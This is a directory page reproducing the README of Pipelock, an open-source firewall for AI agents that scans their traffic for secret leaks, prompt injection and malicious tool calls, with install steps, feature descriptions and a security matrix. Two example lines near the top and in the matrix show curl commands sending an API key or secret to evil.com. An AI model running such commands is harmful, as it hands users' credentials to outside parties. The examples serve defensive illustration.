AIBase
EN
Explore
Pipelock
P

Pipelock

Pipelock is an open-source AI agent firewall that provides security protection with zero runtime dependencies through a single binary file. It adopts an architecture with separated capabilities and deploys a nine-layer scanning pipeline between the agent and the Internet to prevent secret leakage, prompt injection, and malicious tool calls. It supports multiple proxy modes (Fetch proxy, forward proxy, WebSocket proxy) and MCP proxy, and provides functions such as an emergency stop switch, audit logs, and SIEM integration.
SecurityDeveloper tools#AI agent firewall#Secret leakage protection#MCP security proxy#Audit logs.Go
3 points
7.3K
Open Site

Content Details

Alternatives

Installation

Copy the following command to your Client for configuration
Note: Your key is sensitive information, do not share it with anyone.

🚀 Pipelock

An open - source agent firewall for AI agents. It comes as a single binary with zero runtime dependencies, safeguarding agents from potential threats.

CI Security Pipelock Security Scan Go Report Card GitHub Release OpenSSF Scorecard OpenSSF Best Practices codecov CodeRabbit Reviews

Open - source agent firewall for AI agents. Single binary, zero runtime dependencies.

Your agent has $ANTHROPIC_API_KEY in its environment, plus shell access. One request is all it takes:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

Works with: Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor

Quick Start · Integration Guides · Docs · Blog

🚀 Quick Start

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# Or download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Or with Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# Or from source (requires Go 1.24+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

Try it in 30 seconds:

# 1. Generate a config
pipelock generate config --preset balanced > pipelock.yaml

# 2. This should be BLOCKED (DLP catches the fake API key)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. This should be ALLOWED (clean URL, no secrets)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"
Forward proxy mode (zero code changes, any HTTP client)

The forward proxy intercepts standard HTTPS_PROXY traffic. Enable it in your config, then point any process at pipelock:

# Edit pipelock.yaml: set forward_proxy.enabled to true
pipelock run --config pipelock.yaml

export HTTPS_PROXY=http://127.0.0.1:8888
export HTTP_PROXY=http://127.0.0.1:8888

# Now every HTTP request flows through pipelock's scanner.
curl "https://example.com/?key=sk-ant-api03-fake1234567890"  # blocked

No SDK, no wrapper, no code changes. If the agent speaks HTTP, pipelock scans it.

Fetch proxy mode (for agents with a dedicated fetch tool) 
# Start the proxy (agents connect to localhost:8888/fetch?url=...)
pipelock run --config pipelock.yaml

# For full network isolation (agent can ONLY reach pipelock):
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up
Verify release integrity (SLSA provenance + SBOM)

Every release includes SLSA build provenance and an SBOM (CycloneDX). Verify with the GitHub CLI:

# Verify a downloaded binary
gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench

# Verify the container image (substitute the release version)
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

✨ Features

9 - Layer URL Scanner

Every request passes through: scheme validation, domain blocklist, DLP pattern matching (36 built - in patterns for API keys, tokens, and credentials), path entropy analysis, subdomain entropy analysis, SSRF protection with DNS rebinding prevention, per - domain rate limiting, URL length limits, and per - domain data budgets.

DLP runs before DNS resolution. Secrets are caught before any DNS query leaves the proxy. See [docs/bypass - resistance.md](docs/bypass - resistance.md) for the full evasion test matrix.

Response Scanning

Fetched content is scanned for prompt injection before reaching the agent. A 6 - pass normalization pipeline catches zero - width character evasion, homoglyph substitution, leetspeak encoding, and base64 - wrapped payloads. Actions: block, strip, warn, or ask (human - in - the - loop terminal approval).

MCP Proxy

Wraps any MCP server with bidirectional scanning. Three transport modes: stdio subprocess wrapping, Streamable HTTP bridging, and HTTP reverse proxy. Scans both directions: client requests checked for DLP leaks, server responses scanned for injection, and tools/list responses checked for poisoned descriptions and mid - session rug - pull changes.

# Wrap a local MCP server (stdio)
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server - filesystem /tmp

# Proxy a remote MCP server (HTTP)
pipelock mcp proxy --upstream http://localhost:8080/mcp

# Combined mode (fetch/forward proxy + MCP on separate ports)
pipelock run --config pipelock.yaml --mcp - listen 0.0.0.0:8889 --mcp - upstream http://localhost:3000/mcp

MCP Tool Policy

Pre - execution rules that block dangerous tool calls before they reach MCP servers. Ships with 17 built - in rules covering destructive operations, credential access, reverse shells, persistence mechanisms, and encoded command execution. Shell obfuscation detection is built - in.

Tool Call Chain Detection

Detects attack patterns in sequences of MCP tool calls. Ships with 10 built - in patterns covering reconnaissance, credential theft, data staging, persistence, and exfiltration chains. Uses subsequence matching with configurable gap tolerance, so inserting innocent calls between attack steps doesn't evade detection.

Kill Switch

Emergency deny - all with four independent activation sources: config file, SIGUSR1, sentinel file, and remote API. Any one active blocks all traffic. The API can run on a separate port so agents can't deactivate their own kill switch.

# Activate from operator machine
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'

Event Emission

Forward audit events to external systems (SIEM, webhook receivers, syslog). Events are fire - and - forget and never block the proxy. Each event includes a MITRE ATT&CK technique ID where applicable (T1048 for exfiltration, T1059 for injection, T1195.002 for supply chain).

See [docs/guides/siem - integration.md](docs/guides/siem - integration.md) for log schema, forwarding patterns, and example SIEM queries.

More Features

Feature What It Does
Audit Reports pipelock report --input events.jsonl generates HTML/JSON reports with risk rating, timeline, and evidence appendix. Ed25519 signing with --sign. ([Sample report](examples/sample - report.html))
Diagnose pipelock diagnose runs 6 local checks to verify your config works end - to - end (no network required)
TLS Interception Optional CONNECT tunnel MITM: decrypt, scan bodies/headers/responses, re - encrypt. pipelock tls init generates a CA, then pipelock tls install - ca trusts it system - wide.
Block Hints Opt - in explain_blocks: true adds fix suggestions to blocked responses
Project Audit pipelock audit ./project scans for security risks and generates a tailored config
File Integrity SHA256 manifests detect modified, added, or removed workspace files
Git Protection git diff | pipelock git scan - diff catches secrets before they're committed
Ed25519 Signing Key management, file signing, and signature verification for multi - agent trust
Session Profiling Per - session behavioral analysis (domain bursts, volume spikes)
Adaptive Enforcement Per - session threat score accumulation with escalation events (scoring and logging in v1)
Finding Suppression Silence known false positives via config rules or inline pipelock:ignore comments
Multi - Agent Support Agent identification via X - Pipelock - Agent header for per - agent filtering
Fleet Monitoring Prometheus metrics + ready - to - import [Grafana dashboard](configs/grafana - dashboard.json)

![Pipelock Agent Egress Report showing risk rating, timeline, findings by category, and evidence appendix](examples/sample - report.png)

![Pipelock Fleet Monitor: Grafana dashboard showing traffic, security events, and WebSocket metrics](docs/assets/fleet - dashboard.jpg)

📦 Installation

Generate a starter config, or use one of the 7 presets:

pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my - project -o pipelock.yaml  # tailored to your project
Preset Mode Action Best For
configs/balanced.yaml balanced warn General purpose
configs/strict.yaml strict block High - security
configs/audit.yaml audit warn Log - only monitoring
configs/claude - code.yaml balanced block Claude Code (unattended)
configs/cursor.yaml balanced block Cursor IDE
configs/generic - agent.yaml balanced warn New agents (tuning)
configs/hostile - model.yaml strict block Uncensored/abliterated models

Config changes are picked up automatically via file watcher or SIGHUP (most fields hot - reload without restart).

Full reference with all fields, defaults, and hot - reload behavior: docs/configuration.md

💻 Usage Examples

Basic Usage

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# Try it in 30 seconds
pipelock generate config --preset balanced > pipelock.yaml
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

Advanced Usage

# Wrap a local MCP server (stdio)
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server - filesystem /tmp

# Proxy a remote MCP server (HTTP)
pipelock mcp proxy --upstream http://localhost:8080/mcp

📚 Documentation

Document What's In It
Configuration Reference All config fields, defaults, hot - reload behavior, presets
[Deployment Recipes](docs/guides/deployment - recipes.md) Docker Compose, K8s sidecar + NetworkPolicy, iptables, macOS PF
[Bypass Resistance](docs/bypass - resistance.md) Known evasion techniques, mitigations, and honest limitations
[Known Attacks Blocked](docs/attacks - blocked.md) Real attacks with repro snippets and pipelock config that stops them
[Policy Spec v0.1](docs/policy - spec - v0.1.md) Portable agent firewall policy format
[SIEM Integration](docs/guides/siem - integration.md) Log schema, forwarding patterns, KQL/SPL/EQL queries
Metrics Reference All 30 Prometheus metrics, alert rule templates
[OWASP Mapping](docs/owasp - mapping.md) Coverage against OWASP Agentic AI Top 10
Comparison How pipelock compares to agent - scan, srt, agentsh, MCP Gateway
Finding Suppression Rule names, path matching, inline comments, CI integration
OpenClaw Guide Gateway sidecar, init container, generate mcporter wrapping
[Security Assurance](docs/security - assurance.md) Security model, trust boundaries, supply chain
[Transport Modes](docs/guides/transport - modes.md) Comparison of all proxy modes and their scanning capabilities
[EU AI Act Mapping](docs/compliance/eu - ai - act - mapping.md) Article - by - article compliance mapping

🔧 Technical Details

How It Works

Pipelock is an [agent firewall](https://pipelab.org/agent - firewall/): like a WAF for web apps, it sits inline between your AI agent and the internet. It uses capability separation: the agent process (which has secrets) is network - restricted, while Pipelock (which holds no agent secrets) inspects all traffic through a 9 - layer scanner pipeline. Deployment (Docker network isolation, Kubernetes NetworkPolicy, etc.) enforces the separation boundary.

Three proxy modes, same port:

  • Fetch proxy (/fetch?url=...): Pipelock fetches the URL, extracts text, scans the response for prompt injection, and returns clean content. Best for agents that use a dedicated fetch tool.
  • Forward proxy (HTTPS_PROXY): Standard HTTP CONNECT tunneling and absolute - URI forwarding. Agents use Pipelock as their system proxy with zero code changes. Hostname scanning catches blocked domains and SSRF before the tunnel opens. Request body and header DLP scanning catches secrets in POST bodies and auth headers. Optional TLS interception decrypts CONNECT tunnels for full body/header DLP and response injection scanning (requires CA setup via pipelock tls init and pipelock tls install - ca).
  • WebSocket proxy (/ws?url=ws://...): Bidirectional frame scanning with DLP + injection detection on text frames. Fragment reassembly, message size limits, idle timeout, and connection lifetime controls are all built in.
flowchart LR
    subgraph PRIVILEGED["Privileged Zone"]
        Agent["AI Agent\n(has API keys)"]
    end
    subgraph FETCH["Firewall Zone"]
        Proxy["Pipelock\n(no agent secrets)"]
        Scanner["Scanner Pipeline\nSSRF · Blocklist · Rate Limit\nDLP · Env Leak · Entropy · Length"]
    end
    subgraph NET["Internet"]
        Web["Web"]
    end

    Agent -- "fetch URL\nCONNECT\nor WebSocket" --> Proxy
    Proxy --> Scanner
    Scanner -- "content or\ntunnel" --> Agent
    Scanner -- "request" --> Web
    Web -- "response" --> Scanner
    Scanner -- "clean content" --> Agent

    style PRIVILEGED fill:#fee,stroke:#c33
    style FETCH fill:#efe,stroke:#3a3
    style NET fill:#eef,stroke:#33c
Text diagram (for terminals / non - mermaid renderers) 
┌──────────────────────┐         ┌───────────────────────┐
│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │
│                      │         │                       │
│  AI Agent            │  IPC    │  Pipelock             │
│  - Has API keys      │────────>│  - No agent secrets   │
│  - Has credentials   │ fetch / │  - Full internet      │
│  - Restricted network│ CONNECT │  - Returns text       │
│                      │ /ws     │  - WS frame scanning  │
│                      │<────────│  - URL scanning       │
│  Can reach:          │ content │  - Audit logging      │
│  ✓ api.anthropic.com │         │                       │
│  ✓ discord.com       │         │  Can reach:           │
│  ✗ evil.com          │         │  ✓ Any URL            │
│  ✗ pastebin.com      │         │  But has:             │
└──────────────────────┘         │  ✗ No env secrets     │
                                 │  ✗ No credentials     │
                                 └───────────────────────┘

Why Pipelock?

Pipelock Scanners (agent - scan) Sandboxes (srt) Kernel agents (agentsh)
Secret exfiltration prevention Yes Partial (proxy mode) Partial (domain - level) Yes
DLP + entropy analysis Yes No No Partial
Prompt injection detection Yes Yes No No
Workspace integrity monitoring Yes No No Partial
MCP scanning (bidirectional + tool poisoning) Yes Yes No No
WebSocket proxy (frame scanning + fragment reassembly) Yes No No No
MCP HTTP transport (Streamable HTTP + reverse proxy) Yes No No No
Emergency kill switch (config + signal + file + API) Yes No No No
Event emission (webhook + syslog) Yes No No No
Tool call chain detection Yes No No No
Single binary, zero deps Yes No (Python) No (npm) No (kernel - level enforcement)
Audit logging + Prometheus Yes No No No

Full comparison: docs/comparison.md

Security Matrix

Pipelock runs in three modes:

Mode Security Web Browsing Use Case
strict Allowlist - only None Regulated industries, high - security
balanced Blocks naive + detects sophisticated Via fetch or forward proxy Most developers (default)
audit Logging only Unrestricted Evaluation before enforcement

What each mode prevents, detects, or logs:

Attack Vector Strict Balanced Audit
curl evil.com -d $SECRET Prevented Prevented Logged
Secret in URL query params Prevented Detected (DLP scan) Logged
Base64 - encoded secret in URL Prevented Detected (entropy scan) Logged
DNS tunneling Prevented Detected (subdomain entropy) Logged
Chunked exfiltration Prevented Detected (rate + data budget) Logged
Public - key encrypted blob in URL Prevented Logged (entropy flags it) Logged

Honest assessment: Strict mode blocks all outbound HTTP except allowlisted API domains, so there's no exfiltration channel through the proxy. Balanced mode raises the bar from "one curl command" to "sophisticated pre - planned attack." Audit mode gives you visibility you don't have today. Pipelock doesn't sandbox processes or restrict syscalls. It's a content inspection layer. For full defense in depth, pair it with an OS sandbox (see docs/comparison.md).

📄 License

Pipelock core is licensed under the Apache License 2.0. Copyright 2026 Joshua Waldrep.

Multi - agent features (per - agent identity, budgets, and configuration isolation) are gated by the enterprise build tag and licensed under the Elastic License 2.0 (ELv2). The primary implementation is in the enterprise/ directory, with build - tag - gated integration code in cmd/ and internal/. These features require a valid enterprise license key.

The open - source core works independently without enterprise features.

Pre - built release artifacts (Homebrew, GitHub releases, Docker images) include enterprise code that activates with a valid license key. Building from source with go install or the repository Dockerfile produces a Community - only binary.

See LICENSE for the Apache 2.0 text and enterprise/LICENSE for the ELv2 text.

Alternatives

V
Vestige
Vestige is an AI memory engine based on cognitive science. By implementing 29 neuroscience modules such as prediction error gating, FSRS - 6 spaced repetition, and memory dreaming, it provides long - term memory capabilities for AI. It includes a 3D visualization dashboard and 21 MCP tools, runs completely locally, and does not require the cloud.
Rust
10.5K
4.5 points
M
Moltbrain
MoltBrain is a long-term memory layer plugin designed for OpenClaw, MoltBook, and Claude Code, capable of automatically learning and recalling project context, providing intelligent search, observation recording, analysis statistics, and persistent storage functions.
TypeScript
10.1K
4.5 points
B
Bm.md
A feature-rich Markdown typesetting tool that supports multiple style themes and platform adaptation, providing real-time editing preview, image export, and API integration capabilities
TypeScript
14.8K
5 points
S
Security Detections MCP
Security Detections MCP is a server based on the Model Context Protocol that allows LLMs to query a unified security detection rule database covering Sigma, Splunk ESCU, Elastic, and KQL formats. The latest version 3.0 is upgraded to an autonomous detection engineering platform that can automatically extract TTPs from threat intelligence, analyze coverage gaps, generate SIEM-native format detection rules, run tests, and verify. The project includes over 71 tools, 11 pre-built workflow prompts, and a knowledge graph system, supporting multiple SIEM platforms.
TypeScript
6.7K
4 points
P
Paperbanana
Python
8.9K
5 points
B
Better Icons
An MCP server and CLI tool that provides search and retrieval of over 200,000 icons, supports more than 150 icon libraries, and helps AI assistants and developers quickly obtain and use icons.
TypeScript
8.7K
4.5 points
A
Assistant Ui
assistant - ui is an open - source TypeScript/React library for quickly building production - grade AI chat interfaces, providing composable UI components, streaming responses, accessibility, etc., and supporting multiple AI backends and models.
TypeScript
9.0K
5 points
A
Apify MCP Server
The Apify MCP Server is a tool based on the Model Context Protocol (MCP) that allows AI assistants to extract data from websites such as social media, search engines, and e-commerce through thousands of ready-to-use crawlers, scrapers, and automation tools (Apify Actors). It supports OAuth and Skyfire proxy payment and can be integrated into MCP clients such as Claude and VS Code through HTTPS endpoints or local stdio.
TypeScript
8.7K
5 points
M
Markdownify MCP
Markdownify is a multi-functional file conversion service that supports converting multiple formats such as PDFs, images, audio, and web page content into Markdown format.
TypeScript
39.1K
5 points
N
Notion Api MCP
Certified
A Python-based MCP Server that provides advanced to-do list management and content organization functions through the Notion API, enabling seamless integration between AI models and Notion.
Python
24.8K
4.5 points
G
Gitlab MCP Server
Certified
The GitLab MCP server is a project based on the Model Context Protocol that provides a comprehensive toolset for interacting with GitLab accounts, including code review, merge request management, CI/CD configuration, and other functions.
TypeScript
28.4K
4.3 points
D
Duckduckgo MCP Server
Certified
The DuckDuckGo Search MCP Server provides web search and content scraping services for LLMs such as Claude.
Python
80.2K
4.3 points
U
Unity
Certified
UnityMCP is a Unity editor plugin that implements the Model Context Protocol (MCP), providing seamless integration between Unity and AI assistants, including real - time state monitoring, remote command execution, and log functions.
C#
38.4K
5 points
F
Figma Context MCP
Framelink Figma MCP Server is a server that provides access to Figma design data for AI programming tools (such as Cursor). By simplifying the Figma API response, it helps AI more accurately achieve one - click conversion from design to code.
TypeScript
70.6K
4.5 points
M
Minimax MCP Server
The MiniMax Model Context Protocol (MCP) is an official server that supports interaction with powerful text-to-speech, video/image generation APIs, and is suitable for various client tools such as Claude Desktop and Cursor.
Python
55.3K
4.8 points
G
Gmail MCP Server
A Gmail automatic authentication MCP server designed for Claude Desktop, supporting Gmail management through natural language interaction, including complete functions such as sending emails, label management, and batch operations.
TypeScript
24.0K
4.5 points
AIBase
Zhiqi Future, Your AI Solution Think Tank
English简体中文繁體中文にほんご
© 2026AIBase